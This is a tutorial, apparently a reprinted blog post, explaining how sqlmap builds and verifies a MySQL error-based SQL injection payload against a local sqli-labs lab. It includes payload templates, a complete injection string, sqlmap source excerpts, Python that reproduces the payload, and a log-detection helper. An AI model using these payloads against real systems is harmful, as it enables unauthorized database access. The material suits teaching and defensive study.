Python: sqlmap error-based blind injection, payload generation and source analysis
Target URL
http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1
Payload generation
```xml
<test>
    <title>MySQL >= 5.0 AND error-based - WHERE or HAVING clause</title>
    <stype>2</stype>
    <level>1</level>
    <risk>0</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</vector>
    <request>
        <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
    </request>
    <response>
        <grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
    </response>
    <details>
        <dbms>MySQL</dbms>
        <dbms_version>>= 5.0</dbms_version>
    </details>
</test>
```
The test element above is taken from the file payloads.xml.
sqlmap reads the test elements from payloads.xml, iterates over them in a loop, and generates the corresponding payload for each test.
Taking the test above as an example: while iterating over the tests, sqlmap also iterates over the boundary elements (also in payloads.xml) in an inner loop and looks for a boundary that matches the test.
What counts as a match?
Note two child nodes of the test element above: where = 1 and clause = 1.
A boundary matches the current test, and can be used to generate a payload, if and only if the value of the boundary's where node contains the test's where value and the value of the boundary's clause node contains the test's clause value.
For example:
```xml
<boundary>
    <level>1</level>
    <clause>1</clause>
    <where>1,2</where>
    <ptype>2</ptype>
    <prefix>'</prefix>
    <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
</boundary>
```
The where node of this boundary element has the value 1,2, which contains the where value of the test element (1).
Its clause node has the value 1, which contains the clause value of the test element (1).
Therefore this boundary matches the test element.
The payload value of the test element is:
```sql
AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
```
The final payload is assembled from the payload child node of the test and the prefix and suffix child nodes of the boundary, that is:
Final payload = url parameter + boundary.prefix + test.payload + boundary.suffix
with [RANDNUM], [DELIMITER_START] and [DELIMITER_STOP] replaced by generated values (the delimiters are emitted as CHAR(...) sequences, and [RANDSTR] in the suffix becomes a random string).
The generated payload looks like this:
```sql
id=1' AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND 'pujm'='pujm
```
Where:
- URL parameter: id=1
- Prefix: '
- Payload: AND (SELECT 1497 FROM(SELECT COUNT(*),CONCAT(CHAR(58,101,121,111,58),(SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)),CHAR(58,97,98,104,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- Suffix: AND 'pujm'='pujm
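The matching rule and the assembly step described above can be reproduced on the two elements quoted on this page. The following is an added example written for this walkthrough, not code from the original post and not sqlmap's own implementation. It fixes the random parts to the values shown above ([RANDNUM] = 1497, delimiters :eyo: and :abh:, [RANDSTR] = pujm) so the output is deterministic, writes the `<` and `>` inside the grep pattern as XML entities so the element parses, and uses a small helper of its own (as_char) to spell a delimiter as CHAR(...); the OTHER_BOUNDARY element is a constructed non-matching case.

```python
import xml.etree.ElementTree as ET

# Constructed copies of the <test> and <boundary> elements quoted above
# (the <vector> and <details> nodes are omitted; they play no part in matching).
TEST_XML = """<test>
  <title>MySQL >= 5.0 AND error-based - WHERE or HAVING clause</title>
  <stype>2</stype>
  <level>1</level>
  <risk>0</risk>
  <clause>1</clause>
  <where>1</where>
  <request>
    <payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
  </request>
  <response>
    <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
  </response>
</test>"""

BOUNDARY_XML = """<boundary>
  <level>1</level>
  <clause>1</clause>
  <where>1,2</where>
  <ptype>2</ptype>
  <prefix>'</prefix>
  <suffix>AND '[RANDSTR]'='[RANDSTR]</suffix>
</boundary>"""

TEST = ET.fromstring(TEST_XML)
BOUNDARY = ET.fromstring(BOUNDARY_XML)

# A constructed boundary whose clause value (2) does not contain the test's clause (1).
OTHER_BOUNDARY = ET.fromstring(
    "<boundary><level>1</level><clause>2</clause><where>1</where>"
    "<prefix></prefix><suffix></suffix></boundary>"
)


def node_values(elem, tag):
    """Read a comma-separated node such as <where>1,2</where> as a set of ints."""
    text = elem.findtext(tag) or ""
    return {int(v) for v in text.split(",") if v.strip()}


def boundary_matches_test(boundary, test):
    """The matching rule from the text: the boundary's where and clause values
    must contain the test's where and clause values."""
    return (node_values(test, "where") <= node_values(boundary, "where")
            and node_values(test, "clause") <= node_values(boundary, "clause"))


def as_char(s):
    """Helper written for this example: spell a string as MySQL CHAR(...),
    the form the generated payload above uses for the delimiters."""
    return "CHAR(" + ",".join(str(ord(c)) for c in s) + ")"


def build_payload(param, boundary, test, randnum, delim_start, delim_stop, randstr):
    """Final payload = url parameter + boundary.prefix + test.payload + boundary.suffix,
    with the [RANDNUM], [DELIMITER_*] and [RANDSTR] placeholders substituted."""
    if not boundary_matches_test(boundary, test):
        raise ValueError("boundary does not match test")
    body = test.findtext("request/payload")
    # The quoted delimiter placeholders are replaced by CHAR(...) sequences.
    body = body.replace("'[DELIMITER_START]'", as_char(delim_start))
    body = body.replace("'[DELIMITER_STOP]'", as_char(delim_stop))
    body = body.replace("[RANDNUM]", str(randnum))
    suffix = boundary.findtext("suffix").replace("[RANDSTR]", randstr)
    return param + boundary.findtext("prefix") + " " + body + " " + suffix


if __name__ == "__main__":
    print(boundary_matches_test(BOUNDARY, TEST))
    print(boundary_matches_test(OTHER_BOUNDARY, TEST))
    print(build_payload("id=1", BOUNDARY, TEST, 1497, ":eyo:", ":abh:", "pujm"))
```

Running the script prints True, False and then the same payload string the walkthrough shows, which makes it easy to see exactly which substitutions turn the template into the final request.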
The final MySQL statement is:
```sql
SELECT * FROM users WHERE id = '1' AND (SELECT 1497 FROM (SELECT COUNT(*), CONCAT(CHAR(58,101,121,111,58), (SELECT (CASE WHEN (1497=1497) THEN 1 ELSE 0 END)), CHAR(58,97,98,104,58), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) a) AND 'pujm'='pujm'
```
If the parameter id=1 of http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 is injectable, executing this statement raises the following error:
```
Duplicate entry ':eyo:1:abh:1' for key 'group_key'
```
Source code explanation
```python
# In case of error-based SQL injection
elif method == PAYLOAD.METHOD.GREP:
    # Perform the test's request and grep the response
    # body for the test's <grep> regular expression
    try:
        page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
        # Try the body first, then the response headers, then the last redirect message
        output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
                 or extractRegexResult(check, listToStrValue(headers.headers \
                 if headers else None), re.DOTALL | re.IGNORECASE) \
                 or extractRegexResult(check, threadData.lastRedirectMsg[1] \
                 if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
                 threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)

        if output:
            result = output == "1"
            if result:
                infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
                logger.info(infoMsg)

                injectable = True

    # Python 2 except syntax, as in the sqlmap version quoted here
    except sqlmapConnectionException, msg:
        debugMsg = "problem occured most likely because the "
        debugMsg += "server hasn't recovered as expected from the "
        debugMsg += "error-based payload used ('%s')" % msg
        logger.debug(debugMsg)
```
The final payload is passed to the Request.queryPage function, which sends the request and returns the resulting page.
The grep child node of the test element is a regular expression: `<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>`
From the data above we know that
[DELIMITER_START] = :eyo:
[DELIMITER_STOP] = :abh:
so the generated regular expression is `:eyo:(?P<result>.*?):abh:` (it differs on every run, because :eyo: and :abh: are both randomly generated).
The page and the regular expression are passed to the function extractRegexResult:
```python
def extractRegexResult(regex, content, flags=0):
    """
    Returns 'result' group value from a possible match with regex on a given
    content
    """

    retVal = None

    if regex and content and '?P<result>' in regex:
        match = getCompiledRegex(regex, flags).search(content)

        if match:
            retVal = match.group("result")

    return retVal
```
The function is simple: it applies the regular expression to the content and, if there is a match, returns the value of the named result group; otherwise it returns None.
From the above, if the URL is injectable the returned retVal should equal "1":
```python
if output:
    result = output == "1"
    if result:
        infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
        logger.info(infoMsg)

        injectable = True
```
Matching the regular expression `:eyo:(?P<result>.*?):abh:` against `Duplicate entry ':eyo:1:abh:1' for key 'group_key'` gives the result 1.
Therefore the parameter id=1 of http://127.0.0.1/shentou/sqli-labs-master/Less-5/?id=1 is injectable.
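The grep step above, and the same error text seen from the defender's side, as an added example written for this page (not the original post's code and not sqlmap's own implementation). It assumes the delimiters :eyo: and :abh: from the walkthrough, uses re.compile in place of sqlmap's internal getCompiledRegex cache, and works on constructed response bodies and constructed log lines; find_probe_errors shows that the same `Duplicate entry ... for key 'group_key'` message, when it lands in application or database logs, is the footprint of this probe and carries the value the database echoed back between the delimiters.

```python
import re

# Delimiters for this run, as given in the walkthrough (constructed constants).
DELIMITER_START = ":eyo:"
DELIMITER_STOP = ":abh:"
GREP_TEMPLATE = "[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]"


def build_grep_regex(start=DELIMITER_START, stop=DELIMITER_STOP, template=GREP_TEMPLATE):
    """Substitute the run's delimiters into the test's <grep> template."""
    return template.replace("[DELIMITER_START]", start).replace("[DELIMITER_STOP]", stop)


def extract_regex_result(regex, content, flags=0):
    """Port of extractRegexResult, with re.compile standing in for sqlmap's
    getCompiledRegex: return the named 'result' group of the first match, or None."""
    if regex and content and "?P<result>" in regex:
        match = re.compile(regex, flags).search(content)
        if match:
            return match.group("result")
    return None


def is_injectable(page, start=DELIMITER_START, stop=DELIMITER_STOP):
    """The decision made in the grep branch above: the extracted result must be exactly '1'."""
    output = extract_regex_result(build_grep_regex(start, stop), page, re.DOTALL | re.IGNORECASE)
    return output == "1"


# Constructed responses: the error page from the walkthrough and a normal page.
ERROR_PAGE = "Duplicate entry ':eyo:1:abh:1' for key 'group_key'"
NORMAL_PAGE = "<html><body>Your Login name: Dumb<br>Your Password: Dumb</body></html>"

# Constructed log lines: one ordinary database error, one carrying the probe's signature.
SAMPLE_LOG = [
    "2024-01-01 10:00:00 app ERROR Table 'security.userss' doesn't exist",
    "2024-01-01 10:00:05 app ERROR Duplicate entry ':eyo:1:abh:1' for key 'group_key'",
    "2024-01-01 10:00:06 app INFO GET /Less-5/?id=1 200",
]
PROBE_ERROR = re.compile(r"Duplicate entry '(?P<entry>[^']*)' for key 'group_key'")


def find_probe_errors(lines):
    """Return the duplicate-entry values from log lines carrying the group_key error;
    each one is what the database echoed back between the delimiters."""
    return [m.group("entry") for m in map(PROBE_ERROR.search, lines) if m]


if __name__ == "__main__":
    print(build_grep_regex())
    print(is_injectable(ERROR_PAGE), is_injectable(NORMAL_PAGE))
    print(find_probe_errors(SAMPLE_LOG))
```

The flags mirror the call site in the source (re.DOTALL | re.IGNORECASE), so the match succeeds whether the error text arrives on one line or across several; on the defender side, alerting on the group_key duplicate-entry error, which a normal application almost never produces, is a cheap signal that this probe ran, and suppressing detailed database errors from responses removes the channel the technique needs.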
Further reading:
Five error reporting methods and specific use cases during MySQL injection
Copyright
Author: Former Civil Engineer
When reprinting, please cite the source: http://www.cnblogs.com/hongfei/p/sqlmap-error-based-blind.html